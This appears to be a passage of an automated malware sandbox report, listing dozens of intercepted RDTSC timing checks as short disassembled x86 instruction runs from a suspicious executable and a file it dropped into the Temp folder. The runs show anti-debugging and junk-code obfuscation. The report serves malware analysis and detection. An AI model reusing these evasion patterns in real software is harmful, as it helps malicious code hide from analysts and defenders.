                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52D07E9 second address: 52D0825 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a mov cl, bl 0x0000000c popad 0x0000000d mov dword ptr [esp], ecx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushfd 0x00000014 jmp 00007FD668F2A646h 0x00000019 sbb ecx, 70CC2C28h 0x0000001f jmp 00007FD668F2A63Bh 0x00000024 popfd 0x00000025 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52D0825 second address: 52D0857 instructions: 0x00000000 rdtsc 0x00000002 call 00007FD668F2A778h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dx, 2C46h 0x0000000e popad 0x0000000f mov dword ptr [ebp-04h], 55534552h 0x00000016 pushad 0x00000017 mov di, 7E1Eh 0x0000001b push eax 0x0000001c push edx 0x0000001d push edx 0x0000001e pop esi 0x0000001f rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E0BD5 second address: 52E0BFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A649h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ah, E7h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E0BFA second address: 52E0BFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E0BFF second address: 52E0C08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, ADA7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E0C08 second address: 52E0C5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 jmp 00007FD668F2A778h 0x0000000d mov ebp, esp 0x0000000f jmp 00007FD668F2A770h 0x00000014 cmp dword ptr [75C7459Ch], 05h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FD668F2A777h 0x00000022 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E0D06 second address: 52E0D5A instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD668F2A63Ah 0x00000008 adc si, E448h 0x0000000d jmp 00007FD668F2A63Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 mov eax, dword ptr [eax] 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushfd 0x0000001c jmp 00007FD668F2A645h 0x00000021 adc esi, 07B70166h 0x00000027 jmp 00007FD668F2A641h 0x0000002c popfd 0x0000002d rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E0E24 second address: 52E0E56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A779h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FD6D984E2AAh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FD668F2A76Dh 0x00000016 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E0E56 second address: 52E0EBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FD668F2A647h 0x00000008 pop ecx 0x00000009 mov di, BDBCh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 cmp dword ptr [ebp+08h], 00002000h 0x00000017 pushad 0x00000018 mov edi, 7E7C0854h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushfd 0x00000020 jmp 00007FD668F2A643h 0x00000025 sub si, 36EEh 0x0000002a jmp 00007FD668F2A649h 0x0000002f popfd 0x00000030 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F0982 second address: 52F0987 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F0987 second address: 52F09D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD668F2A643h 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FD668F2A63Bh 0x00000019 xor ah, 0000004Eh 0x0000001c jmp 00007FD668F2A649h 0x00000021 popfd 0x00000022 mov edx, ecx 0x00000024 popad 0x00000025 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F09D4 second address: 52F0A0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, D9h 0x00000005 jmp 00007FD668F2A774h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov esi, dword ptr [ebp+0Ch] 0x00000010 jmp 00007FD668F2A770h 0x00000015 test esi, esi 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F0A0B second address: 52F0A11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F0A11 second address: 52F0A8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, eax 0x00000005 mov ecx, 022CF1EDh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d je 00007FD6D98480FFh 0x00000013 pushad 0x00000014 mov bx, si 0x00000017 call 00007FD668F2A772h 0x0000001c pushfd 0x0000001d jmp 00007FD668F2A772h 0x00000022 or ecx, 4FE68FE8h 0x00000028 jmp 00007FD668F2A76Bh 0x0000002d popfd 0x0000002e pop ecx 0x0000002f popad 0x00000030 cmp dword ptr [75C7459Ch], 05h 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a push esi 0x0000003b pop edx 0x0000003c pushfd 0x0000003d jmp 00007FD668F2A76Ch 0x00000042 add eax, 7E482248h 0x00000048 jmp 00007FD668F2A76Bh 0x0000004d popfd 0x0000004e popad 0x0000004f rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F0A8D second address: 52F0AC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A649h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FD6D9860023h 0x0000000f pushad 0x00000010 mov bh, cl 0x00000012 popad 0x00000013 xchg eax, esi 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FD668F2A63Ch 0x0000001d rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F0AC5 second address: 52F0AC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F0AC9 second address: 52F0ACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F0ACF second address: 52F0AE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD668F2A76Dh 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F0B3B second address: 52F0B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F0B3F second address: 52F0B4E instructions: 0x00000000 rdtsc 0x00000002 movzx esi, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F0B4E second address: 52F0B52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F0B52 second address: 52F0B6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A777h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F0B6D second address: 52F0B73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F0B73 second address: 52F0B77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F0BD1 second address: 52F0C00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FD668F2A643h 0x00000008 pop ecx 0x00000009 mov ax, di 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FD668F2A63Dh 0x00000019 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F0C00 second address: 52F0C15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A771h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F0C15 second address: 52F0C1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F0C1A second address: 52F0C28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F0C28 second address: 52F0C2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F0C2C second address: 52F0C32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: 97FB32 second address: 97FB44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007FD668F2A63Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: 97FB44 second address: 97FB48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: AFE344 second address: AFE368 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A63Ah 0x00000007 jmp 00007FD668F2A646h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: AFE368 second address: AFE372 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD668F2A76Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: AFE76B second address: AFE77B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD668F2A63Ch 0x00000009 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: AFE8A8 second address: AFE8AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: AFEA06 second address: AFEA22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD668F2A641h 0x00000010 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B010DE second address: B010ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A76Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B010ED second address: B0111F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FD668F2A636h 0x00000009 jmp 00007FD668F2A648h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jg 00007FD668F2A636h 0x0000001f rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B0111F second address: B01125 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B01242 second address: B0125D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD668F2A647h 0x00000009 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B0125D second address: B01297 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jc 00007FD668F2A777h 0x0000000f jmp 00007FD668F2A771h 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 jg 00007FD668F2A76Eh 0x0000001e mov eax, dword ptr [eax] 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B01297 second address: B0129B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B0129B second address: B012A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B012A1 second address: B012C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 js 00007FD668F2A636h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 pop eax 0x00000017 jmp 00007FD668F2A63Bh 0x0000001c popad 0x0000001d rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B012C4 second address: B01316 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007FD668F2A768h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 push 00000003h 0x00000025 push 00000000h 0x00000027 mov edi, dword ptr [ebp+122D29C0h] 0x0000002d push 00000003h 0x0000002f jmp 00007FD668F2A774h 0x00000034 push DA7E1349h 0x00000039 push ecx 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B01316 second address: B0131A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B01392 second address: B01450 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A76Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov edi, dword ptr [ebp+122D295Ch] 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007FD668F2A768h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 00000017h 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e mov edx, 308D7F32h 0x00000033 push 1AB7C3B0h 0x00000038 jmp 00007FD668F2A76Fh 0x0000003d xor dword ptr [esp], 1AB7C330h 0x00000044 add dword ptr [ebp+122D2DDAh], ebx 0x0000004a push 00000003h 0x0000004c mov dword ptr [ebp+122D227Eh], edx 0x00000052 push 00000000h 0x00000054 jbe 00007FD668F2A76Ch 0x0000005a mov ecx, dword ptr [ebp+122D2BD0h] 0x00000060 mov esi, dword ptr [ebp+122D2027h] 0x00000066 push 00000003h 0x00000068 push 00000000h 0x0000006a push esi 0x0000006b call 00007FD668F2A768h 0x00000070 pop esi 0x00000071 mov dword ptr [esp+04h], esi 0x00000075 add dword ptr [esp+04h], 0000001Ch 0x0000007d inc esi 0x0000007e push esi 0x0000007f ret 0x00000080 pop esi 0x00000081 ret 0x00000082 mov di, E428h 0x00000086 call 00007FD668F2A769h 0x0000008b push eax 0x0000008c push edx 0x0000008d jne 00007FD668F2A76Ch 0x00000093 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B01450 second address: B01456 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B01456 second address: B0145A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B0145A second address: B01490 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FD668F2A647h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD668F2A63Fh 0x0000001a rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B01490 second address: B014BC instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD668F2A766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b mov eax, dword ptr [eax] 0x0000000d jnp 00007FD668F2A771h 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jnc 00007FD668F2A766h 0x00000021 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B014BC second address: B014C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B014C0 second address: B014C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B014C6 second address: B014CB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B014CB second address: B0151C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop eax 0x00000008 mov ecx, ebx 0x0000000a lea ebx, dword ptr [ebp+12454E84h] 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007FD668F2A768h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 00000018h 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a add si, E024h 0x0000002f xchg eax, ebx 0x00000030 jo 00007FD668F2A775h 0x00000036 jmp 00007FD668F2A76Fh 0x0000003b push eax 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B0151C second address: B01520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B01520 second address: B01524 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: AF9DA5 second address: AF9DBD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FD668F2A63Eh 0x0000000c jng 00007FD668F2A636h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: AF9DBD second address: AF9DC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: AF9DC1 second address: AF9E0A instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD668F2A636h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnc 00007FD668F2A63Ch 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jne 00007FD668F2A65Bh 0x00000019 pushad 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: AF9E0A second address: AF9E23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD668F2A774h 0x00000009 popad 0x0000000a rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: AF9E23 second address: AF9E3A instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD668F2A642h 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B20872 second address: B2087E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push edi 0x00000006 pop edi 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B2087E second address: B20882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B20A09 second address: B20A0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: AF9E33 second address: AF9E3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B21530 second address: B21556 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD668F2A766h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jg 00007FD668F2A77Ah 0x00000012 jmp 00007FD668F2A774h 0x00000017 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B216B3 second address: B216DA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD668F2A63Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD668F2A649h 0x00000013 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B2183C second address: B21843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B21843 second address: B21880 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A63Bh 0x00000007 jne 00007FD668F2A655h 0x0000000d jns 00007FD668F2A636h 0x00000013 jmp 00007FD668F2A649h 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d jo 00007FD668F2A636h 0x00000023 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B219B8 second address: B219C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A76Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
